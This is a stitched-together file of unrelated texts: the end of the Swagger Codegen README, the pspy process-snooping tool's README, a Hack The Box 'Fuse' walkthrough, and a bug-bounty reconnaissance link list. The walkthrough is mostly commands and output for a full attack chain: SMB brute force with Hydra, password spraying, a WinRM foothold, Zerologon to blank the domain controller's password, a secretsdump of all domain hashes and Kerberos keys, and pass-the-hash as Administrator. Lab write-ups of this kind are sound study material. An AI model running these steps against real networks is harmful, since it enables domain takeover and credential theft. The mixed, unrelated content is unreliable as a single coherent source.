in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`:
For example, `curl https://generator.swagger.io/api/gen/clients/python` returns
```
{
"packageName":{
"opt":"packageName",
"description":"python package name (convention: snake_case).",
"type":"string",
"default":"swagger_client"
},
"packageVersion":{
"opt":"packageVersion",
"description":"python package version.",
"type":"string",
"default":"1.0.0"
},
"sortParamsByRequiredFlag":{
"opt":"sortParamsByRequiredFlag",
"description":"Sort method arguments to place required parameters before optional parameters.",
"type":"boolean",
"default":"true"
}
}
```
To set package name to `pet_store`, the HTTP body of the request is as follows:
```
{
"options": {
"packageName": "pet_store"
},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
and here is the curl command:
```
curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python
```
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md)
Companies/Projects using Swagger Codegen
----------------------------------------
Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page.
- [Activehours](https://www.activehours.com/)
- [Acunetix](https://www.acunetix.com/)
- [Atlassian](https://www.atlassian.com/)
- [Autodesk](http://www.autodesk.com/)
- [Avenida Compras S.A.](https://www.avenida.com.ar)
- [AYLIEN](http://aylien.com/)
- [Balance Internet](https://www.balanceinternet.com.au/)
- [beemo](http://www.beemo.eu)
- [bitly](https://bitly.com)
- [Bufferfly Network](https://www.butterflynetinc.com/)
- [Cachet Financial](http://www.cachetfinancial.com/)
- [carpolo](http://www.carpolo.co/)
- [CloudBoost](https://www.CloudBoost.io/)
- [Conplement](http://www.conplement.de/)
- [Cummins] (http://www.cummins.com/)
- [Cupix](http://www.cupix.com)
- [DBBest Technologies](https://www.dbbest.com)
- [DecentFoX](http://decentfox.com/)
- [DocuSign](https://www.docusign.com)
- [Ergon](http://www.ergon.ch/)
- [EMC](https://www.emc.com/)
- [eureka](http://eure.jp/)
- [everystory.us](http://everystory.us)
- [Expected Behavior](http://www.expectedbehavior.com/)
- [Fastly](https://www.fastly.com/)
- [Flat](https://flat.io)
- [Finder](http://en.finder.pl/)
- [FH Münster - University of Applied Sciences](http://www.fh-muenster.de)
- [Fotition](https://www.fotition.com/)
- [Gear Zero Network](https://www.gearzero.ca)
- [Germin8](http://www.germin8.com)
- [goTransverse](http://www.gotransverse.com/api)
- [GraphHopper](https://graphhopper.com/)
- [Gravitate Solutions](http://gravitatesolutions.com/)
- [HashData](http://www.hashdata.cn/)
- [Hewlett Packard Enterprise](https://hpe.com)
- [High Technologies Center](http://htc-cs.com)
- [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications)
- [Intent HQ](http://www.intenthq.com)
- [Interactive Intelligence](http://developer.mypurecloud.com/)
- [Kabuku](http://www.kabuku.co.jp/en)
- [Kurio](https://kurio.co.id)
- [Kuroi](http://kuroiwebdesign.com/)
- [Kuary](https://kuary.com/)
- [Kubernetes](https://kubernetes.io/)
- [LANDR Audio](https://www.landr.com/)
- [Lascaux](http://www.lascaux.it/)
- [Leica Geosystems AG](http://leica-geosystems.com)
- [LiveAgent](https://www.ladesk.com/)
- [LXL Tech](http://lxltech.com)
- [MailMojo](https://mailmojo.no/)
- [Mindera](http://mindera.com/)
- [Mporium](http://mporium.com/)
- [Neverfail](https://neverfail.com/)
- [nViso](http://www.nviso.ch/)
- [Okiok](https://www.okiok.com)
- [Onedata](http://onedata.org)
- [OrderCloud.io](http://ordercloud.io)
- [OSDN](https://osdn.jp)
- [PagerDuty](https://www.pagerduty.com)
- [PagerTree](https://pagertree.com)
- [Pepipost](https://www.pepipost.com)
- [Plexxi](http://www.plexxi.com)
- [Pixoneye](http://www.pixoneye.com/)
- [PostAffiliatePro](https://www.postaffiliatepro.com/)
- [Prill Tecnologia](http://www.prill.com.br)
- [QAdept](http://qadept.com/)
- [QuantiModo](https://quantimo.do/)
- [QuickBlox](https://quickblox.com/)
- [Rapid7](https://rapid7.com/)
- [Reload! A/S](https://reload.dk/)
- [REstore](https://www.restore.eu)
- [Revault Sàrl](http://revault.ch)
- [Riffyn](https://riffyn.com)
- [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html)
- [Saritasa](https://www.saritasa.com/)
- [SCOOP Software GmbH](http://www.scoop-software.de)
- [Shine Solutions](https://shinesolutions.com/)
- [Simpfony](https://www.simpfony.com/)
- [Skurt](http://www.skurt.com)
- [Slamby](https://www.slamby.com/)
- [SmartRecruiters](https://www.smartrecruiters.com/)
- [snapCX](https://snapcx.io)
- [SPINEN](http://www.spinen.com)
- [SRC](https://www.src.si/)
- [StyleRecipe](http://stylerecipe.co.jp)
- [Svenska Spel AB](https://www.svenskaspel.se/)
- [TaskData](http://www.taskdata.com/)
- [ThoughtWorks](https://www.thoughtworks.com)
- [Upwork](http://upwork.com/)
- [uShip](https://www.uship.com/)
- [VMware](https://vmware.com/)
- [W.UP](http://wup.hu/?siteLang=en)
- [Wealthfront](https://www.wealthfront.com/)
- [Webever GmbH](https://www.webever.de/)
- [WEXO A/S](https://www.wexo.dk/)
- [Zalando](https://tech.zalando.com)
- [ZEEF.com](https://zeef.com/)
# Swagger Codegen Core Team
Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis.
## API Clients
| Languages | Core Team (join date) |
|:-------------|:-------------|
| ActionScript | |
| C++ | |
| C# | @jimschubert (2016/05/01) | |
| Clojure | @xhh (2016/05/01) |
| Dart | |
| Groovy | |
| Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) |
| Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) |
| Java (Spring Cloud) | @cbornet (2016/07/19) |
| NodeJS/Javascript | @xhh (2016/05/01) |
| ObjC | @mateuszmackowiak (2016/05/09) |
| Perl | @wing328 (2016/05/01) |
| PHP | @arnested (2016/05/01) |
| Python | @scottrw93 (2016/05/01) |
| Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) |
| Scala | |
| Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) |
| TypeScript (Node) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular1) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular2) | @Vrolijkx (2016/05/01) |
| TypeScript (Fetch) | |
## Server Stubs
| Languages | Core Team (date joined) |
|:------------- |:-------------|
| C# ASP.NET5 | @jimschubert (2016/05/01) |
| Go Server | @guohuang (2016/06/13) |
| Haskell Servant | |
| Java Spring Boot | @cbornet (2016/07/19) |
| Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) |
| Java JAX-RS | |
| NancyFX | |
| NodeJS | @kolyjjj (2016/05/01) |
| PHP Lumen | @abcsum (2016/05/01) |
| PHP Silex | |
| PHP Slim | |
| Python Flask | |
| Ruby Sinatra | @wing328 (2016/05/01) | |
| Scala Scalatra | | |
| Scala Finch | @jimschubert (2017/01/28) |
## Template Creator
Here is a list of template creators:
* API Clients:
* Akka-Scala: @cchafer
* Bash: @bkryza
* C++ REST: @Danielku15
* C# (.NET 2.0): @who
* Clojure: @xhh
* Dart: @yissachar
* Elixir: @niku
* Groovy: @victorgit
* Go: @wing328
* Java (Feign): @davidkiss
* Java (Retrofit): @0legg
* Java (Retrofi2): @emilianobonassi
* Java (Jersey2): @xhh
* Java (okhttp-gson): @xhh
* Javascript/NodeJS: @jfiala
* Javascript (Closure-annotated Angular) @achew22
* JMeter @davidkiss
* Perl: @wing328
* Swift: @tkqubo
* Swift 3: @hexelon
* TypeScript (Node): @mhardorf
* TypeScript (Angular1): @mhardorf
* TypeScript (Fetch): @leonyu
* TypeScript (Angular2): @roni-frantchi
* Server Stubs
* C# ASP.NET5: @jimschubert
* C# NancyFX: @mstefaniuk
* Erlang Server: @galaxie
* Go Server: @guohuang
* Haskell Servant: @algas
* Java MSF4J: @sanjeewa-malalgoda
* Java Spring Boot: @diyfr
* Java Undertow: @stevehu
* JAX-RS RestEasy: @chameleon82
* JAX-RS CXF: @hiveship
* JAX-RS CXF (CDI): @nickcmaynard
* JAX-RS RestEasy (JBoss EAP): @jfiala
* PHP Lumen: @abcsum
* PHP Slim: @jfastnacht
* PHP Zend Expressive (with Path Handler): @Articus
* Ruby on Rails 5: @zlx
* Scala Finch: @jimschubert
* Documentation
* HTML Doc 2: @jhitchcock
* Confluence Wiki: @jhitchcock
## How to join the core team
Here are the requirements to become a core team member:
- rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors
- to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22)
- regular contributions to the project
- about 3 hours per week
- for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc
To join the core team, please reach out to wing328hk@gmail.com (@wing328) for more information.
To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator.
# Swagger Codegen Evangelist
Swagger Codegen Evangelist shoulders one or more of the following responsibilities:
- publishes articles on the benefit of Swagger Codegen
- organizes local Meetups
- presents the benefits of Swagger Codegen in local Meetups or conferences
- actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D)
- submits PRs to improve Swagger Codegen
- reviews PRs submitted by the others
- ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors)
If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to wing328hk@gmail.com (@wing328)
### List of Swagger Codegen Evangelists
- Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016)
- [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem)
- [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/)
# License information on Generated Code
The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points:
* The templates included with this project are subject to the [License](#license).
* Generated code is intentionally _not_ subject to the parent project license
When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate.
License
-------
Copyright 2017 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
<img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
|
<img src="images/logo.svg" align="left" />
# pspy - unprivileged Linux process snooping
[![Go Report Card](https://goreportcard.com/badge/github.com/DominicBreuker/pspy)](https://goreportcard.com/report/github.com/DominicBreuker/pspy)
[![Maintainability](https://api.codeclimate.com/v1/badges/23328b2549a76aa11dd5/maintainability)](https://codeclimate.com/github/DominicBreuker/pspy/maintainability)
[![Test Coverage](https://api.codeclimate.com/v1/badges/23328b2549a76aa11dd5/test_coverage)](https://codeclimate.com/github/DominicBreuker/pspy/test_coverage)
[![CircleCI](https://circleci.com/gh/DominicBreuker/pspy.svg?style=svg)](https://circleci.com/gh/DominicBreuker/pspy)
pspy is a command line tool designed to snoop on processes without need for root permissions.
It allows you to see commands run by other users, cron jobs, etc. as they execute.
Great for enumeration of Linux systems in CTFs.
Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.
The tool gathers the info from procfs scans.
Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
## Getting started
### Download
Get the tool onto the Linux machine you want to inspect.
First get the binaries. Download the released binaries here:
- 32 bit big, static version: `pspy32` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32)
- 64 bit big, static version: `pspy64` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64)
- 32 bit small version: `pspy32s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32s)
- 64 bit small version: `pspy64s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64s)
The statically compiled files should work on any Linux system but are quite huge (~4MB).
If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).
### Build
Either use Go installed on your system or run the Docker-based build process which ran to create the release.
For the latter, ensure Docker is installed, and then run `make build-build-image` to build a Docker image, followed by `make build` to build the binaries with it.
You can run `pspy --help` to learn about the flags and their meaning.
The summary is as follows:
- -p: enables printing commands to stdout (enabled by default)
- -f: enables printing file system events to stdout (disabled by default)
- -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
- -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
- -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
- -c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID.
- --debug: prints verbose error messages which are otherwise hidden.
The default settings should be fine for most applications.
Watching files inside `/usr` is most important since many tools will access libraries inside it.
Some more complex examples:
```bash
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
# disable printing discovered commands but enable file system events
./pspy64 -p=false -f
```
### Examples
### Cron job watching
To see the tool in action, just clone the repo and run `make example` (Docker needed).
It is known passing passwords as command line arguments is not safe, and the example can be used to demonstrate it.
The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute.
pspy run in foreground, as user myuser, and scans for processes.
You should see output similar to this:
```console
~/pspy (master) $ make example
[...]
docker run -it --rm local/pspy-example:latest
[+] cron started
[+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
[+] Starting pspy now...
Watching recursively : [/usr /tmp /etc /home /var /opt] (6)
Watching non-recursively: [] (0)
Printing: processes=true file-system events=false
2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
2018/02/18 21:00:03 CMD: UID=0 PID=9 | cron -f
2018/02/18 21:00:03 CMD: UID=0 PID=7 | sudo cron -f
2018/02/18 21:00:03 CMD: UID=1000 PID=14 | pspy
2018/02/18 21:00:03 CMD: UID=1000 PID=1 | /bin/bash /entrypoint.sh
2018/02/18 21:01:01 CMD: UID=0 PID=20 | CRON -f
2018/02/18 21:01:01 CMD: UID=0 PID=21 | CRON -f
2018/02/18 21:01:01 CMD: UID=0 PID=22 | python3 /root/scripts/password_reset.py
2018/02/18 21:01:01 CMD: UID=0 PID=25 |
2018/02/18 21:01:01 CMD: UID=??? PID=24 | ???
2018/02/18 21:01:01 CMD: UID=0 PID=23 | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
2018/02/18 21:01:01 CMD: UID=0 PID=26 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2018/02/18 21:01:01 CMD: UID=101 PID=27 |
2018/02/18 21:01:01 CMD: UID=8 PID=28 | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk
```
First, pspy prints all currently running processes, each with PID, UID and the command line.
When pspy detects a new process, it adds a line to this log.
In this example, you find a process with PID 23 which seems to change the password of myuser.
This is the result of a Python script used in roots private crontab `/var/spool/cron/crontabs/root`, which executes this shell command (check [crontab](docker/var/spool/cron/crontabs/root) and [script](docker/root/scripts/password_reset.py)).
Note that myuser can neither see the crontab nor the Python script.
With pspy, it can see the commands nevertheless.
### CTF example from Hack The Box
Below is an example from the machine Shrek from [Hack The Box](https://www.hackthebox.eu/).
In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder.
The vulnerability is the insecure use of a wildcard together with chmod ([details](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) for the interested reader).
It requires substantial guesswork to find and exploit it.
With pspy though, the cron job is easy to find and analyse:
![animated demo gif](images/demo.gif)
## How it works
Tools exist to list all processes executed on Linux systems, including those that have finished.
For instance there is [forkstat](http://smackerelofopinion.blogspot.de/2014/03/forkstat-new-tool-to-trace-process.html).
It receives notifications from the kernel on process-related events such as fork and exec.
These tools require root privileges, but that should not give you a false sense of security.
Nothing stops you from snooping on the processes running on a Linux system.
A lot of information is visible in procfs as long as a process is running.
The only problem is you have to catch short-lived processes in the very short time span in which they are alive.
Scanning the `/proc` directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU.
A stealthier way is to use the following trick.
Process tend to access files such as libraries in `/usr`, temporary files in `/tmp`, log files in `/var`, ...
Using the [inotify](http://man7.org/linux/man-pages/man7/inotify.7.html) API, you can get notifications whenever these files are created, modified, deleted, accessed, etc.
Linux does not require priviledged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer).
Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.
We can use the file system events as a trigger to scan `/proc`, hoping that we can do it fast enough to catch the processes.
This is what pspy does.
There is no guarantee you won't miss one, but chances seem to be good in my experiments.
In general, the longer the processes run, the bigger the chance of catching them is.
# Misc
Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" ([link](https://commons.wikimedia.org/wiki/File%3ACreative-Tail-People-spy.svg))
|
## Brute Force
#### Cewl to get a pwd dictionary
It may take a minute or so
```bash
❯ cewl --with-numbers http://fuse.fabricorp.local/papercut/logs/html/index.htm -w cewl3.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```
#### Hydra
It may take two or three minutes
```bash
❯ cat users.txt
pmerton
tlavel
❯ export IP=10.129.2.5
❯ hydra -L users.txt -P cewl3.txt $IP smb
[445][smb] host: 10.129.2.5 login: tlavel password: Fabricorp01
```
## SMB
#### smbclient
```bash
❯ smbclient -L $IP -U tlavel
Password for [WORKGROUP\tlavel]:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
```
#### smbpasswd to update it
```bash
smbpasswd -r $IP -U tlavel <- won't work, use impacket instead
❯ /usr/bin/impacket-smbpasswd -newpass Qwer4321= tlavel:Fabricorp01@$IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
```
## RPC enum printers
```bash
❯ rpcclient -U "tlavel" $IP
Password for [WORKGROUP\tlavel]:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.129.2.5\HP-MFT01]
description:[\\10.129.2.5\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
❯ cat enumdomusers.txt | cut -d "]" -f1 | cut -d "[" -f2
```
#### Optional: crackmapexec build users.list
```
❯ crackmapexec smb $IP -u bhult -p Qwer4321=
```
## Password Spray
* https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Windows/Active%20Directory/Forest/README.md#password-spraying---making-a-target-user-list-htb-academy
```bash
❯ crackmapexec winrm $IP -u users.txt -p '$fab@s3Rv1ce$1'
SMB 10.129.2.5 5985 FUSE [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)
HTTP 10.129.2.5 5985 FUSE [*] http://10.129.2.5:5985/wsman
WINRM 10.129.2.5 5985 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1
WINRM 10.129.2.5 5985 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1
WINRM 10.129.2.5 5985 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1
WINRM 10.129.2.5 5985 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1
WINRM 10.129.2.5 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
```
## Foothold
```bash
evil-winrm -i $IP -u svc-print -p '$fab@s3Rv1ce$1'
```
## Reference
* https://www.tarlogic.com/blog/seloaddriverprivilege-privilege-escalation/
* https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
* https://www.hackingarticles.in/fuse-hackthebox-walkthrough/
* https://github.com/Kyuu-Ji/htb-write-up/blob/master/fuse/write-up-fuse.md
* https://www.secjuice.com/htb-fuse-walkthrough/
* https://0xn1ghtr1ngs.github.io/posts/Fuse-HTB/
* https://snowscan.io/htb-writeup-fuse/
* https://chr0x6eos.github.io/2020/10/31/htb-Fuse.html
* https://github.com/FuzzySecurity/Capcom-Rootkit
* https://fuzzysecurity.com/tutorials/28.html
* https://steflan-security.com/hack-the-box-fuse-walkthrough/
* https://github.com/A1vinSmith/htb-scripts
* https://initone.dz/htb-walkthrough-fuse/
## Privilege Escalation
### Method 1: SeLoadDriverPrivilege
```bash cmd
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
```
### Method 2: Zerologon
https://github.com/A1vinSmith/zerologon
#### Check doamin's NetBIOS
```powershell
nbtstat -n
Ethernet0 2:
Node IpAddress: [10.129.2.5] Scope Id: []
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
FUSE <00> UNIQUE Registered
FABRICORP <1C> GROUP Registered
FABRICORP <00> GROUP Registered
FUSE <20> UNIQUE Registered
FABRICORP <1B> UNIQUE Registered
```
#### Set DC to empty string password
```bash
❯ python set_empty_pw.py FUSE $IP
Performing authentication attempts...
=============================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b'\xe5Q\xe0\xdfa\xddt+'
NegotiateFlags: 556793855
AccountRid: 1000
ErrorCode: 0
server challenge b'\xe5\xe9<t\xdeO]k'
NetrServerPasswordSet2Response
ReturnAuthenticator:
Credential:
Data: b'\x01\xdb\xb3\xba\xf2A\xe1\xde'
Timestamp: 0
ErrorCode: 0
Success! DC should now have the empty string as its machine password.
```
```bash
impacket-secretsdump -just-dc -no-pass FUSE\$@$IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd:::
tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2:::
svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536:::
mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80:::
dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161:::
FUSE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984
Administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68
Administrator:des-cbc-md5:0dfe83ce576d8aae
krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e
krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6
krbtgt:des-cbc-md5:49d93d43321f02b3
svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754
svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99
svc-print:des-cbc-md5:fea11fdf6bd3105b
bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6
bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32
bnielson:des-cbc-md5:9826c42010254a76
sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5
sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9
sthompson:des-cbc-md5:4f9291c46291ba02
tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525
tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f
tlavel:des-cbc-md5:2a238576ab7a6213
pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7
pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710
pmerton:des-cbc-md5:ef3794940d6d0120
svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c
svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56
svc-scan:des-cbc-md5:e30b208ccecd57ad
bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74
bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336
bhult:des-cbc-md5:4a1a209d4532a7b9
dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce
dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8
dandrews:des-cbc-md5:9ec2b53eae6b20f2
mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a
mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da
mberbatov:des-cbc-md5:8023a16b9b3d5186
astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735
astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b
astein:des-cbc-md5:254f802902f8ec7a
dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0
dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762
dmuir:des-cbc-md5:7fb515d59846498a
FUSE$:aes256-cts-hmac-sha1-96:ba250f2101ecad1a2aa8fab0c95d7a66b59c904eb0edd47121f51ff561f3fb2e
FUSE$:aes128-cts-hmac-sha1-96:bf995eed47e2a8849b72e95eabd5a929
FUSE$:des-cbc-md5:b085ab974ff1e049
[*] Cleaning up...
```
```bash
evil-winrm -i $IP -u Administrator -H 370ddcf45959b2293427baa70376e14e
```
|
# Resources
**Reconnaissance** is a mission to obtain information by visual observation or other detection methods, about the activities and resources of an enemy or potential enemy, or about the meteorologic, hydrographic, or geographic characteristics of a particular area.
• Find Acquisition(google 6 month rule), use tools or just google it.
Example: List_of_mergers_and_acquisitions_by_COMPANYNAME
https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Alphabet
https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Meta_Platforms
• Search eg :
responsible disclosure 2022
Company responsible disclosure
Or check out the suggested keywords by search engines.
• Go to bug bounty platform and look for new listed programs
• TLDS, Mobile websites, New mobile app versions and Searching parent company by trademark or privacy policy
• ASNS, reversewhois, (Identifying IPs and main TLDS) etc
Index | Reconnaissancece understanding
--- | ---
**1** | [Ip/ DNS](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Reconnaissance/Ip%26DNS.md)
**2** | [Subdomain Recon - Horizontal and verticle](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Reconnaissance/Reconnaissance.md)
Index | Reconnaissancece/Methodology
--- | ---
**1** | [How To Do Your Reconnaissance](https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-)
**2** | [My Guide to Basic Reckon](https://blog.securitybreached.org/2017/11/25/guide-to-basic-recon-for-bugbounty/)
**3** | [Shankar Bug Hunting Methodology(part 1)](https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066)
